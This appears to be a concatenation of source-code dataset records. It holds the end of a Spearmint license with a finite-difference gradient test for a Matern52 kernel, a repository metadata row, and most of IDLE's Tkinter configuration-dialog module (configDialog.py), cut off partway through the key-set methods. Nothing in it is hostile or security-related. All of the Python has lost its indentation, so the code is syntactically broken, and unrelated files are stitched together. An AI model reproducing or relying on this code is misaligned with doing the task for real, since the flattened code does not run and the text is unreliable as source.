# TORONTO OR SHERBROOKE OR SOCPRA IS ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGES.
#
# 10. INDEMNIFICATION. To the extent permitted by law, End User shall
# indemnify, defend and hold harmless Harvard, Toronto and Sherbrooke
# and Socpra, their corporate affiliates, current or future directors,
# trustees, officers, faculty, medical and professional staff,
# employees, students and agents and their respective successors,
# heirs and assigns (the "Indemnitees"), against any liability,
# damage, loss or expense (including reasonable attorney's fees and
# expenses of litigation) incurred by or imposed upon the Indemnitees
# or any one of them in connection with any claims, suits, actions,
# demands or judgments arising from End User’s breach of this
# Agreement or its Institution’s use of the Software except to the
# extent caused by the gross negligence or willful misconduct of
# Harvard, Toronto or Sherbrooke or Socpra. This indemnification
# provision shall survive expiration or termination of this Agreement.
#
# 11. GOVERNING LAW. This Agreement shall be construed and governed by
# the laws of the Commonwealth of Massachusetts regardless of
# otherwise applicable choice of law standards.
#
# 12. NON-USE OF NAME. Nothing in this License and Terms of Use shall
# be construed as granting End Users or their Institutions any rights
# or licenses to use any trademarks, service marks or logos associated
# with the Software. You may not use the terms “Harvard” or
# “University of Toronto” or “Université de Sherbrooke” or “Socpra
# Sciences et Génie S.E.C.” (or a substantially similar term) in any
# way that is inconsistent with the permitted uses described
# herein. You agree not to use any name or emblem of Harvard, Toronto
# or Sherbrooke, or any of their subdivisions for any purpose, or to
# falsely suggest any relationship between End User (or its
# Institution) and Harvard, Toronto and/or Sherbrooke, or in any
# manner that would infringe or violate any of their rights.
#
# 13. End User represents and warrants that it has the legal authority
# to enter into this License and Terms of Use on behalf of itself and
# its Institution.
import numpy as np
import numpy.random as npr
from spearmint.kernels import Matern52, Scale
def test_grad():
npr.seed(1)
eps = 1e-5
N = 10
M = 5
D = 3
kernel = Scale(Matern52(D))
kernel.amp2.value = 5.75
data1 = npr.randn(N,D)
data2 = npr.randn(M,D)
loss = np.sum(kernel.cross_cov(data1, data2))
dloss = kernel.cross_cov_grad_data(data1, data2).sum(0)
dloss_est = np.zeros(dloss.shape)
for i in xrange(M):
for j in xrange(D):
data2[i,j] += eps
loss_1 = np.sum(kernel.cross_cov(data1, data2))
data2[i,j] -= 2*eps
loss_2 = np.sum(kernel.cross_cov(data1, data2))
data2[i,j] += eps
dloss_est[i,j] = ((loss_1 - loss_2) / (2*eps))
assert np.linalg.norm(dloss - dloss_est) < 1e-6
| 47.049774 | 70 | 0.763224 |
ace749b701a3dd769a97fbca55a1a0a8647a1f80 | 53,555 | py | Python | lib_python/2.7/idlelib/configDialog.py | kevinxucs/pyston | bdb87c1706ac74a0d15d9bc2bae53798678a5f14 | [
"Apache-2.0"
] | 1 | 2020-02-06T14:28:45.000Z | 2020-02-06T14:28:45.000Z | lib_python/2.7/idlelib/configDialog.py | kevinxucs/pyston | bdb87c1706ac74a0d15d9bc2bae53798678a5f14 | [
"Apache-2.0"
] | null | null | null | lib_python/2.7/idlelib/configDialog.py | kevinxucs/pyston | bdb87c1706ac74a0d15d9bc2bae53798678a5f14 | [
"Apache-2.0"
] | 1 | 2020-02-06T14:29:00.000Z | 2020-02-06T14:29:00.000Z | """IDLE Configuration Dialog: support user customization of IDLE by GUI
Customize font faces, sizes, and colorization attributes. Set indentation
defaults. Customize keybindings. Colorization and keybindings can be
saved as user defined sets. Select startup options including shell/editor
and default window size. Define additional help sources.
Note that tab width in IDLE is currently fixed at eight due to Tk issues.
Refer to comments in EditorWindow autoindent code for details.
"""
from Tkinter import *
import tkMessageBox, tkColorChooser, tkFont
import string
from idlelib.configHandler import idleConf
from idlelib.dynOptionMenuWidget import DynOptionMenu
from idlelib.tabbedpages import TabbedPageSet
from idlelib.keybindingDialog import GetKeysDialog
from idlelib.configSectionNameDialog import GetCfgSectionNameDialog
from idlelib.configHelpSourceEdit import GetHelpSourceDialog
from idlelib import macosxSupport
class ConfigDialog(Toplevel):
def __init__(self,parent,title):
Toplevel.__init__(self, parent)
self.wm_withdraw()
self.configure(borderwidth=5)
self.title('IDLE Preferences')
self.geometry("+%d+%d" % (parent.winfo_rootx()+20,
parent.winfo_rooty()+30))
#Theme Elements. Each theme element key is its display name.
#The first value of the tuple is the sample area tag name.
#The second value is the display name list sort index.
self.themeElements={'Normal Text':('normal','00'),
'Python Keywords':('keyword','01'),
'Python Definitions':('definition','02'),
'Python Builtins':('builtin', '03'),
'Python Comments':('comment','04'),
'Python Strings':('string','05'),
'Selected Text':('hilite','06'),
'Found Text':('hit','07'),
'Cursor':('cursor','08'),
'Error Text':('error','09'),
'Shell Normal Text':('console','10'),
'Shell Stdout Text':('stdout','11'),
'Shell Stderr Text':('stderr','12'),
}
self.ResetChangedItems() #load initial values in changed items dict
self.CreateWidgets()
self.resizable(height=FALSE,width=FALSE)
self.transient(parent)
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.Cancel)
self.parent = parent
self.tabPages.focus_set()
#key bindings for this dialog
#self.bind('<Escape>',self.Cancel) #dismiss dialog, no save
#self.bind('<Alt-a>',self.Apply) #apply changes, save
#self.bind('<F1>',self.Help) #context help
self.LoadConfigs()
self.AttachVarCallbacks() #avoid callbacks during LoadConfigs
self.wm_deiconify()
self.wait_window()
def CreateWidgets(self):
self.tabPages = TabbedPageSet(self,
page_names=['Fonts/Tabs','Highlighting','Keys','General'])
frameActionButtons = Frame(self,pady=2)
#action buttons
if macosxSupport.isAquaTk():
# Changing the default padding on OSX results in unreadable
# text in the buttons
paddingArgs={}
else:
paddingArgs={'padx':6, 'pady':3}
# Comment out button creation and packing until implement self.Help
## self.buttonHelp = Button(frameActionButtons,text='Help',
## command=self.Help,takefocus=FALSE,
## **paddingArgs)
self.buttonOk = Button(frameActionButtons,text='Ok',
command=self.Ok,takefocus=FALSE,
**paddingArgs)
self.buttonApply = Button(frameActionButtons,text='Apply',
command=self.Apply,takefocus=FALSE,
**paddingArgs)
self.buttonCancel = Button(frameActionButtons,text='Cancel',
command=self.Cancel,takefocus=FALSE,
**paddingArgs)
self.CreatePageFontTab()
self.CreatePageHighlight()
self.CreatePageKeys()
self.CreatePageGeneral()
## self.buttonHelp.pack(side=RIGHT,padx=5)
self.buttonOk.pack(side=LEFT,padx=5)
self.buttonApply.pack(side=LEFT,padx=5)
self.buttonCancel.pack(side=LEFT,padx=5)
frameActionButtons.pack(side=BOTTOM)
Frame(self, height=2, borderwidth=0).pack(side=BOTTOM)
self.tabPages.pack(side=TOP,expand=TRUE,fill=BOTH)
def CreatePageFontTab(self):
#tkVars
self.fontSize=StringVar(self)
self.fontBold=BooleanVar(self)
self.fontName=StringVar(self)
self.spaceNum=IntVar(self)
self.editFont=tkFont.Font(self,('courier',10,'normal'))
##widget creation
#body frame
frame=self.tabPages.pages['Fonts/Tabs'].frame
#body section frames
frameFont=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Base Editor Font ')
frameIndent=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Indentation Width ')
#frameFont
frameFontName=Frame(frameFont)
frameFontParam=Frame(frameFont)
labelFontNameTitle=Label(frameFontName,justify=LEFT,
text='Font Face :')
self.listFontName=Listbox(frameFontName,height=5,takefocus=FALSE,
exportselection=FALSE)
self.listFontName.bind('<ButtonRelease-1>',self.OnListFontButtonRelease)
scrollFont=Scrollbar(frameFontName)
scrollFont.config(command=self.listFontName.yview)
self.listFontName.config(yscrollcommand=scrollFont.set)
labelFontSizeTitle=Label(frameFontParam,text='Size :')
self.optMenuFontSize=DynOptionMenu(frameFontParam,self.fontSize,None,
command=self.SetFontSample)
checkFontBold=Checkbutton(frameFontParam,variable=self.fontBold,
onvalue=1,offvalue=0,text='Bold',command=self.SetFontSample)
frameFontSample=Frame(frameFont,relief=SOLID,borderwidth=1)
self.labelFontSample=Label(frameFontSample,
text='AaBbCcDdEe\nFfGgHhIiJjK\n1234567890\n#:+=(){}[]',
justify=LEFT,font=self.editFont)
#frameIndent
frameIndentSize=Frame(frameIndent)
labelSpaceNumTitle=Label(frameIndentSize, justify=LEFT,
text='Python Standard: 4 Spaces!')
self.scaleSpaceNum=Scale(frameIndentSize, variable=self.spaceNum,
orient='horizontal',
tickinterval=2, from_=2, to=16)
#widget packing
#body
frameFont.pack(side=LEFT,padx=5,pady=5,expand=TRUE,fill=BOTH)
frameIndent.pack(side=LEFT,padx=5,pady=5,fill=Y)
#frameFont
frameFontName.pack(side=TOP,padx=5,pady=5,fill=X)
frameFontParam.pack(side=TOP,padx=5,pady=5,fill=X)
labelFontNameTitle.pack(side=TOP,anchor=W)
self.listFontName.pack(side=LEFT,expand=TRUE,fill=X)
scrollFont.pack(side=LEFT,fill=Y)
labelFontSizeTitle.pack(side=LEFT,anchor=W)
self.optMenuFontSize.pack(side=LEFT,anchor=W)
checkFontBold.pack(side=LEFT,anchor=W,padx=20)
frameFontSample.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=BOTH)
self.labelFontSample.pack(expand=TRUE,fill=BOTH)
#frameIndent
frameIndentSize.pack(side=TOP,fill=X)
labelSpaceNumTitle.pack(side=TOP,anchor=W,padx=5)
self.scaleSpaceNum.pack(side=TOP,padx=5,fill=X)
return frame
def CreatePageHighlight(self):
self.builtinTheme=StringVar(self)
self.customTheme=StringVar(self)
self.fgHilite=BooleanVar(self)
self.colour=StringVar(self)
self.fontName=StringVar(self)
self.themeIsBuiltin=BooleanVar(self)
self.highlightTarget=StringVar(self)
##widget creation
#body frame
frame=self.tabPages.pages['Highlighting'].frame
#body section frames
frameCustom=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Custom Highlighting ')
frameTheme=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Highlighting Theme ')
#frameCustom
self.textHighlightSample=Text(frameCustom,relief=SOLID,borderwidth=1,
font=('courier',12,''),cursor='hand2',width=21,height=11,
takefocus=FALSE,highlightthickness=0,wrap=NONE)
text=self.textHighlightSample
text.bind('<Double-Button-1>',lambda e: 'break')
text.bind('<B1-Motion>',lambda e: 'break')
textAndTags=(('#you can click here','comment'),('\n','normal'),
('#to choose items','comment'),('\n','normal'),('def','keyword'),
(' ','normal'),('func','definition'),('(param):','normal'),
('\n ','normal'),('"""string"""','string'),('\n var0 = ','normal'),
("'string'",'string'),('\n var1 = ','normal'),("'selected'",'hilite'),
('\n var2 = ','normal'),("'found'",'hit'),
('\n var3 = ','normal'),('list', 'builtin'), ('(','normal'),
('None', 'builtin'),(')\n\n','normal'),
(' error ','error'),(' ','normal'),('cursor |','cursor'),
('\n ','normal'),('shell','console'),(' ','normal'),('stdout','stdout'),
(' ','normal'),('stderr','stderr'),('\n','normal'))
for txTa in textAndTags:
text.insert(END,txTa[0],txTa[1])
for element in self.themeElements.keys():
text.tag_bind(self.themeElements[element][0],'<ButtonPress-1>',
lambda event,elem=element: event.widget.winfo_toplevel()
.highlightTarget.set(elem))
text.config(state=DISABLED)
self.frameColourSet=Frame(frameCustom,relief=SOLID,borderwidth=1)
frameFgBg=Frame(frameCustom)
buttonSetColour=Button(self.frameColourSet,text='Choose Colour for :',
command=self.GetColour,highlightthickness=0)
self.optMenuHighlightTarget=DynOptionMenu(self.frameColourSet,
self.highlightTarget,None,highlightthickness=0)#,command=self.SetHighlightTargetBinding
self.radioFg=Radiobutton(frameFgBg,variable=self.fgHilite,
value=1,text='Foreground',command=self.SetColourSampleBinding)
self.radioBg=Radiobutton(frameFgBg,variable=self.fgHilite,
value=0,text='Background',command=self.SetColourSampleBinding)
self.fgHilite.set(1)
buttonSaveCustomTheme=Button(frameCustom,
text='Save as New Custom Theme',command=self.SaveAsNewTheme)
#frameTheme
labelTypeTitle=Label(frameTheme,text='Select : ')
self.radioThemeBuiltin=Radiobutton(frameTheme,variable=self.themeIsBuiltin,
value=1,command=self.SetThemeType,text='a Built-in Theme')
self.radioThemeCustom=Radiobutton(frameTheme,variable=self.themeIsBuiltin,
value=0,command=self.SetThemeType,text='a Custom Theme')
self.optMenuThemeBuiltin=DynOptionMenu(frameTheme,
self.builtinTheme,None,command=None)
self.optMenuThemeCustom=DynOptionMenu(frameTheme,
self.customTheme,None,command=None)
self.buttonDeleteCustomTheme=Button(frameTheme,text='Delete Custom Theme',
command=self.DeleteCustomTheme)
##widget packing
#body
frameCustom.pack(side=LEFT,padx=5,pady=5,expand=TRUE,fill=BOTH)
frameTheme.pack(side=LEFT,padx=5,pady=5,fill=Y)
#frameCustom
self.frameColourSet.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=X)
frameFgBg.pack(side=TOP,padx=5,pady=0)
self.textHighlightSample.pack(side=TOP,padx=5,pady=5,expand=TRUE,
fill=BOTH)
buttonSetColour.pack(side=TOP,expand=TRUE,fill=X,padx=8,pady=4)
self.optMenuHighlightTarget.pack(side=TOP,expand=TRUE,fill=X,padx=8,pady=3)
self.radioFg.pack(side=LEFT,anchor=E)
self.radioBg.pack(side=RIGHT,anchor=W)
buttonSaveCustomTheme.pack(side=BOTTOM,fill=X,padx=5,pady=5)
#frameTheme
labelTypeTitle.pack(side=TOP,anchor=W,padx=5,pady=5)
self.radioThemeBuiltin.pack(side=TOP,anchor=W,padx=5)
self.radioThemeCustom.pack(side=TOP,anchor=W,padx=5,pady=2)
self.optMenuThemeBuiltin.pack(side=TOP,fill=X,padx=5,pady=5)
self.optMenuThemeCustom.pack(side=TOP,fill=X,anchor=W,padx=5,pady=5)
self.buttonDeleteCustomTheme.pack(side=TOP,fill=X,padx=5,pady=5)
return frame
def CreatePageKeys(self):
#tkVars
self.bindingTarget=StringVar(self)
self.builtinKeys=StringVar(self)
self.customKeys=StringVar(self)
self.keysAreBuiltin=BooleanVar(self)
self.keyBinding=StringVar(self)
##widget creation
#body frame
frame=self.tabPages.pages['Keys'].frame
#body section frames
frameCustom=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Custom Key Bindings ')
frameKeySets=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Key Set ')
#frameCustom
frameTarget=Frame(frameCustom)
labelTargetTitle=Label(frameTarget,text='Action - Key(s)')
scrollTargetY=Scrollbar(frameTarget)
scrollTargetX=Scrollbar(frameTarget,orient=HORIZONTAL)
self.listBindings=Listbox(frameTarget,takefocus=FALSE,
exportselection=FALSE)
self.listBindings.bind('<ButtonRelease-1>',self.KeyBindingSelected)
scrollTargetY.config(command=self.listBindings.yview)
scrollTargetX.config(command=self.listBindings.xview)
self.listBindings.config(yscrollcommand=scrollTargetY.set)
self.listBindings.config(xscrollcommand=scrollTargetX.set)
self.buttonNewKeys=Button(frameCustom,text='Get New Keys for Selection',
command=self.GetNewKeys,state=DISABLED)
#frameKeySets
frames = [Frame(frameKeySets, padx=2, pady=2, borderwidth=0)
for i in range(2)]
self.radioKeysBuiltin=Radiobutton(frames[0],variable=self.keysAreBuiltin,
value=1,command=self.SetKeysType,text='Use a Built-in Key Set')
self.radioKeysCustom=Radiobutton(frames[0],variable=self.keysAreBuiltin,
value=0,command=self.SetKeysType,text='Use a Custom Key Set')
self.optMenuKeysBuiltin=DynOptionMenu(frames[0],
self.builtinKeys,None,command=None)
self.optMenuKeysCustom=DynOptionMenu(frames[0],
self.customKeys,None,command=None)
self.buttonDeleteCustomKeys=Button(frames[1],text='Delete Custom Key Set',
command=self.DeleteCustomKeys)
buttonSaveCustomKeys=Button(frames[1],
text='Save as New Custom Key Set',command=self.SaveAsNewKeySet)
##widget packing
#body
frameCustom.pack(side=BOTTOM,padx=5,pady=5,expand=TRUE,fill=BOTH)
frameKeySets.pack(side=BOTTOM,padx=5,pady=5,fill=BOTH)
#frameCustom
self.buttonNewKeys.pack(side=BOTTOM,fill=X,padx=5,pady=5)
frameTarget.pack(side=LEFT,padx=5,pady=5,expand=TRUE,fill=BOTH)
#frame target
frameTarget.columnconfigure(0,weight=1)
frameTarget.rowconfigure(1,weight=1)
labelTargetTitle.grid(row=0,column=0,columnspan=2,sticky=W)
self.listBindings.grid(row=1,column=0,sticky=NSEW)
scrollTargetY.grid(row=1,column=1,sticky=NS)
scrollTargetX.grid(row=2,column=0,sticky=EW)
#frameKeySets
self.radioKeysBuiltin.grid(row=0, column=0, sticky=W+NS)
self.radioKeysCustom.grid(row=1, column=0, sticky=W+NS)
self.optMenuKeysBuiltin.grid(row=0, column=1, sticky=NSEW)
self.optMenuKeysCustom.grid(row=1, column=1, sticky=NSEW)
self.buttonDeleteCustomKeys.pack(side=LEFT,fill=X,expand=True,padx=2)
buttonSaveCustomKeys.pack(side=LEFT,fill=X,expand=True,padx=2)
frames[0].pack(side=TOP, fill=BOTH, expand=True)
frames[1].pack(side=TOP, fill=X, expand=True, pady=2)
return frame
def CreatePageGeneral(self):
#tkVars
self.winWidth=StringVar(self)
self.winHeight=StringVar(self)
self.paraWidth=StringVar(self)
self.startupEdit=IntVar(self)
self.autoSave=IntVar(self)
self.encoding=StringVar(self)
self.userHelpBrowser=BooleanVar(self)
self.helpBrowser=StringVar(self)
#widget creation
#body
frame=self.tabPages.pages['General'].frame
#body section frames
frameRun=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Startup Preferences ')
frameSave=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Autosave Preferences ')
frameWinSize=Frame(frame,borderwidth=2,relief=GROOVE)
frameParaSize=Frame(frame,borderwidth=2,relief=GROOVE)
frameEncoding=Frame(frame,borderwidth=2,relief=GROOVE)
frameHelp=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Additional Help Sources ')
#frameRun
labelRunChoiceTitle=Label(frameRun,text='At Startup')
radioStartupEdit=Radiobutton(frameRun,variable=self.startupEdit,
value=1,command=self.SetKeysType,text="Open Edit Window")
radioStartupShell=Radiobutton(frameRun,variable=self.startupEdit,
value=0,command=self.SetKeysType,text='Open Shell Window')
#frameSave
labelRunSaveTitle=Label(frameSave,text='At Start of Run (F5) ')
radioSaveAsk=Radiobutton(frameSave,variable=self.autoSave,
value=0,command=self.SetKeysType,text="Prompt to Save")
radioSaveAuto=Radiobutton(frameSave,variable=self.autoSave,
value=1,command=self.SetKeysType,text='No Prompt')
#frameWinSize
labelWinSizeTitle=Label(frameWinSize,text='Initial Window Size'+
' (in characters)')
labelWinWidthTitle=Label(frameWinSize,text='Width')
entryWinWidth=Entry(frameWinSize,textvariable=self.winWidth,
width=3)
labelWinHeightTitle=Label(frameWinSize,text='Height')
entryWinHeight=Entry(frameWinSize,textvariable=self.winHeight,
width=3)
#paragraphFormatWidth
labelParaWidthTitle=Label(frameParaSize,text='Paragraph reformat'+
' width (in characters)')
entryParaWidth=Entry(frameParaSize,textvariable=self.paraWidth,
width=3)
#frameEncoding
labelEncodingTitle=Label(frameEncoding,text="Default Source Encoding")
radioEncLocale=Radiobutton(frameEncoding,variable=self.encoding,
value="locale",text="Locale-defined")
radioEncUTF8=Radiobutton(frameEncoding,variable=self.encoding,
value="utf-8",text="UTF-8")
radioEncNone=Radiobutton(frameEncoding,variable=self.encoding,
value="none",text="None")
#frameHelp
frameHelpList=Frame(frameHelp)
frameHelpListButtons=Frame(frameHelpList)
scrollHelpList=Scrollbar(frameHelpList)
self.listHelp=Listbox(frameHelpList,height=5,takefocus=FALSE,
exportselection=FALSE)
scrollHelpList.config(command=self.listHelp.yview)
self.listHelp.config(yscrollcommand=scrollHelpList.set)
self.listHelp.bind('<ButtonRelease-1>',self.HelpSourceSelected)
self.buttonHelpListEdit=Button(frameHelpListButtons,text='Edit',
state=DISABLED,width=8,command=self.HelpListItemEdit)
self.buttonHelpListAdd=Button(frameHelpListButtons,text='Add',
width=8,command=self.HelpListItemAdd)
self.buttonHelpListRemove=Button(frameHelpListButtons,text='Remove',
state=DISABLED,width=8,command=self.HelpListItemRemove)
#widget packing
#body
frameRun.pack(side=TOP,padx=5,pady=5,fill=X)
frameSave.pack(side=TOP,padx=5,pady=5,fill=X)
frameWinSize.pack(side=TOP,padx=5,pady=5,fill=X)
frameParaSize.pack(side=TOP,padx=5,pady=5,fill=X)
frameEncoding.pack(side=TOP,padx=5,pady=5,fill=X)
frameHelp.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=BOTH)
#frameRun
labelRunChoiceTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
radioStartupShell.pack(side=RIGHT,anchor=W,padx=5,pady=5)
radioStartupEdit.pack(side=RIGHT,anchor=W,padx=5,pady=5)
#frameSave
labelRunSaveTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
radioSaveAuto.pack(side=RIGHT,anchor=W,padx=5,pady=5)
radioSaveAsk.pack(side=RIGHT,anchor=W,padx=5,pady=5)
#frameWinSize
labelWinSizeTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
entryWinHeight.pack(side=RIGHT,anchor=E,padx=10,pady=5)
labelWinHeightTitle.pack(side=RIGHT,anchor=E,pady=5)
entryWinWidth.pack(side=RIGHT,anchor=E,padx=10,pady=5)
labelWinWidthTitle.pack(side=RIGHT,anchor=E,pady=5)
#paragraphFormatWidth
labelParaWidthTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
entryParaWidth.pack(side=RIGHT,anchor=E,padx=10,pady=5)
#frameEncoding
labelEncodingTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
radioEncNone.pack(side=RIGHT,anchor=E,pady=5)
radioEncUTF8.pack(side=RIGHT,anchor=E,pady=5)
radioEncLocale.pack(side=RIGHT,anchor=E,pady=5)
#frameHelp
frameHelpListButtons.pack(side=RIGHT,padx=5,pady=5,fill=Y)
frameHelpList.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=BOTH)
scrollHelpList.pack(side=RIGHT,anchor=W,fill=Y)
self.listHelp.pack(side=LEFT,anchor=E,expand=TRUE,fill=BOTH)
self.buttonHelpListEdit.pack(side=TOP,anchor=W,pady=5)
self.buttonHelpListAdd.pack(side=TOP,anchor=W)
self.buttonHelpListRemove.pack(side=TOP,anchor=W,pady=5)
return frame
def AttachVarCallbacks(self):
self.fontSize.trace_variable('w',self.VarChanged_fontSize)
self.fontName.trace_variable('w',self.VarChanged_fontName)
self.fontBold.trace_variable('w',self.VarChanged_fontBold)
self.spaceNum.trace_variable('w',self.VarChanged_spaceNum)
self.colour.trace_variable('w',self.VarChanged_colour)
self.builtinTheme.trace_variable('w',self.VarChanged_builtinTheme)
self.customTheme.trace_variable('w',self.VarChanged_customTheme)
self.themeIsBuiltin.trace_variable('w',self.VarChanged_themeIsBuiltin)
self.highlightTarget.trace_variable('w',self.VarChanged_highlightTarget)
self.keyBinding.trace_variable('w',self.VarChanged_keyBinding)
self.builtinKeys.trace_variable('w',self.VarChanged_builtinKeys)
self.customKeys.trace_variable('w',self.VarChanged_customKeys)
self.keysAreBuiltin.trace_variable('w',self.VarChanged_keysAreBuiltin)
self.winWidth.trace_variable('w',self.VarChanged_winWidth)
self.winHeight.trace_variable('w',self.VarChanged_winHeight)
self.paraWidth.trace_variable('w',self.VarChanged_paraWidth)
self.startupEdit.trace_variable('w',self.VarChanged_startupEdit)
self.autoSave.trace_variable('w',self.VarChanged_autoSave)
self.encoding.trace_variable('w',self.VarChanged_encoding)
def VarChanged_fontSize(self,*params):
value=self.fontSize.get()
self.AddChangedItem('main','EditorWindow','font-size',value)
def VarChanged_fontName(self,*params):
value=self.fontName.get()
self.AddChangedItem('main','EditorWindow','font',value)
def VarChanged_fontBold(self,*params):
value=self.fontBold.get()
self.AddChangedItem('main','EditorWindow','font-bold',value)
def VarChanged_spaceNum(self,*params):
value=self.spaceNum.get()
self.AddChangedItem('main','Indent','num-spaces',value)
def VarChanged_colour(self,*params):
self.OnNewColourSet()
def VarChanged_builtinTheme(self,*params):
value=self.builtinTheme.get()
self.AddChangedItem('main','Theme','name',value)
self.PaintThemeSample()
def VarChanged_customTheme(self,*params):
value=self.customTheme.get()
if value != '- no custom themes -':
self.AddChangedItem('main','Theme','name',value)
self.PaintThemeSample()
def VarChanged_themeIsBuiltin(self,*params):
value=self.themeIsBuiltin.get()
self.AddChangedItem('main','Theme','default',value)
if value:
self.VarChanged_builtinTheme()
else:
self.VarChanged_customTheme()
def VarChanged_highlightTarget(self,*params):
self.SetHighlightTarget()
def VarChanged_keyBinding(self,*params):
value=self.keyBinding.get()
keySet=self.customKeys.get()
event=self.listBindings.get(ANCHOR).split()[0]
if idleConf.IsCoreBinding(event):
#this is a core keybinding
self.AddChangedItem('keys',keySet,event,value)
else: #this is an extension key binding
extName=idleConf.GetExtnNameForEvent(event)
extKeybindSection=extName+'_cfgBindings'
self.AddChangedItem('extensions',extKeybindSection,event,value)
def VarChanged_builtinKeys(self,*params):
value=self.builtinKeys.get()
self.AddChangedItem('main','Keys','name',value)
self.LoadKeysList(value)
def VarChanged_customKeys(self,*params):
value=self.customKeys.get()
if value != '- no custom keys -':
self.AddChangedItem('main','Keys','name',value)
self.LoadKeysList(value)
def VarChanged_keysAreBuiltin(self,*params):
value=self.keysAreBuiltin.get()
self.AddChangedItem('main','Keys','default',value)
if value:
self.VarChanged_builtinKeys()
else:
self.VarChanged_customKeys()
def VarChanged_winWidth(self,*params):
value=self.winWidth.get()
self.AddChangedItem('main','EditorWindow','width',value)
def VarChanged_winHeight(self,*params):
value=self.winHeight.get()
self.AddChangedItem('main','EditorWindow','height',value)
def VarChanged_paraWidth(self,*params):
value=self.paraWidth.get()
self.AddChangedItem('main','FormatParagraph','paragraph',value)
def VarChanged_startupEdit(self,*params):
value=self.startupEdit.get()
self.AddChangedItem('main','General','editor-on-startup',value)
def VarChanged_autoSave(self,*params):
value=self.autoSave.get()
self.AddChangedItem('main','General','autosave',value)
def VarChanged_encoding(self,*params):
value=self.encoding.get()
self.AddChangedItem('main','EditorWindow','encoding',value)
def ResetChangedItems(self):
#When any config item is changed in this dialog, an entry
#should be made in the relevant section (config type) of this
#dictionary. The key should be the config file section name and the
#value a dictionary, whose key:value pairs are item=value pairs for
#that config file section.
self.changedItems={'main':{},'highlight':{},'keys':{},'extensions':{}}
def AddChangedItem(self,type,section,item,value):
value=str(value) #make sure we use a string
if section not in self.changedItems[type]:
self.changedItems[type][section]={}
self.changedItems[type][section][item]=value
def GetDefaultItems(self):
dItems={'main':{},'highlight':{},'keys':{},'extensions':{}}
for configType in dItems.keys():
sections=idleConf.GetSectionList('default',configType)
for section in sections:
dItems[configType][section]={}
options=idleConf.defaultCfg[configType].GetOptionList(section)
for option in options:
dItems[configType][section][option]=(
idleConf.defaultCfg[configType].Get(section,option))
return dItems
def SetThemeType(self):
if self.themeIsBuiltin.get():
self.optMenuThemeBuiltin.config(state=NORMAL)
self.optMenuThemeCustom.config(state=DISABLED)
self.buttonDeleteCustomTheme.config(state=DISABLED)
else:
self.optMenuThemeBuiltin.config(state=DISABLED)
self.radioThemeCustom.config(state=NORMAL)
self.optMenuThemeCustom.config(state=NORMAL)
self.buttonDeleteCustomTheme.config(state=NORMAL)
def SetKeysType(self):
if self.keysAreBuiltin.get():
self.optMenuKeysBuiltin.config(state=NORMAL)
self.optMenuKeysCustom.config(state=DISABLED)
self.buttonDeleteCustomKeys.config(state=DISABLED)
else:
self.optMenuKeysBuiltin.config(state=DISABLED)
self.radioKeysCustom.config(state=NORMAL)
self.optMenuKeysCustom.config(state=NORMAL)
self.buttonDeleteCustomKeys.config(state=NORMAL)
def GetNewKeys(self):
listIndex=self.listBindings.index(ANCHOR)
binding=self.listBindings.get(listIndex)
bindName=binding.split()[0] #first part, up to first space
if self.keysAreBuiltin.get():
currentKeySetName=self.builtinKeys.get()
else:
currentKeySetName=self.customKeys.get()
currentBindings=idleConf.GetCurrentKeySet()
if currentKeySetName in self.changedItems['keys'].keys(): #unsaved changes
keySetChanges=self.changedItems['keys'][currentKeySetName]
for event in keySetChanges.keys():
currentBindings[event]=keySetChanges[event].split()
currentKeySequences=currentBindings.values()
newKeys=GetKeysDialog(self,'Get New Keys',bindName,
currentKeySequences).result
if newKeys: #new keys were specified
if self.keysAreBuiltin.get(): #current key set is a built-in
message=('Your changes will be saved as a new Custom Key Set. '+
'Enter a name for your new Custom Key Set below.')
newKeySet=self.GetNewKeysName(message)
if not newKeySet: #user cancelled custom key set creation
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
return
else: #create new custom key set based on previously active key set
self.CreateNewKeySet(newKeySet)
self.listBindings.delete(listIndex)
self.listBindings.insert(listIndex,bindName+' - '+newKeys)
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
self.keyBinding.set(newKeys)
else:
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
def GetNewKeysName(self,message):
usedNames=(idleConf.GetSectionList('user','keys')+
idleConf.GetSectionList('default','keys'))
newKeySet=GetCfgSectionNameDialog(self,'New Custom Key Set',
message,usedNames).result
return newKeySet
def SaveAsNewKeySet(self):
newKeysName=self.GetNewKeysName('New Key Set Name:')
if newKeysName:
self.CreateNewKeySet(newKeysName)
def KeyBindingSelected(self,event):
self.buttonNewKeys.config(state=NORMAL)
def CreateNewKeySet(self,newKeySetName):
#creates new custom key set based on the previously active key set,
#and makes the new key set active
if self.keysAreBuiltin.get():
prevKeySetName=self.builtinKeys.get()
else:
prevKeySetName=self.customKeys.get()
prevKeys=idleConf.GetCoreKeys(prevKeySetName)
newKeys={}
for event in prevKeys.keys(): #add key set to changed items
eventName=event[2:-2] #trim off the angle brackets
binding=string.join(prevKeys[event])
newKeys[eventName]=binding
#handle any unsaved changes to prev key set
if prevKeySetName in self.changedItems['keys'].keys():
keySetChanges=self.changedItems['keys'][prevKeySetName]
for event in keySetChanges.keys():
newKeys[event]=keySetChanges[event]
#save the new theme
self.SaveNewKeySet(newKeySetName,newKeys)
#change gui over to the new key set
customKeyList=idleConf.GetSectionList('user','keys')
customKeyList.sort()
self.optMenuKeysCustom.SetMenu(customKeyList,newKeySetName)
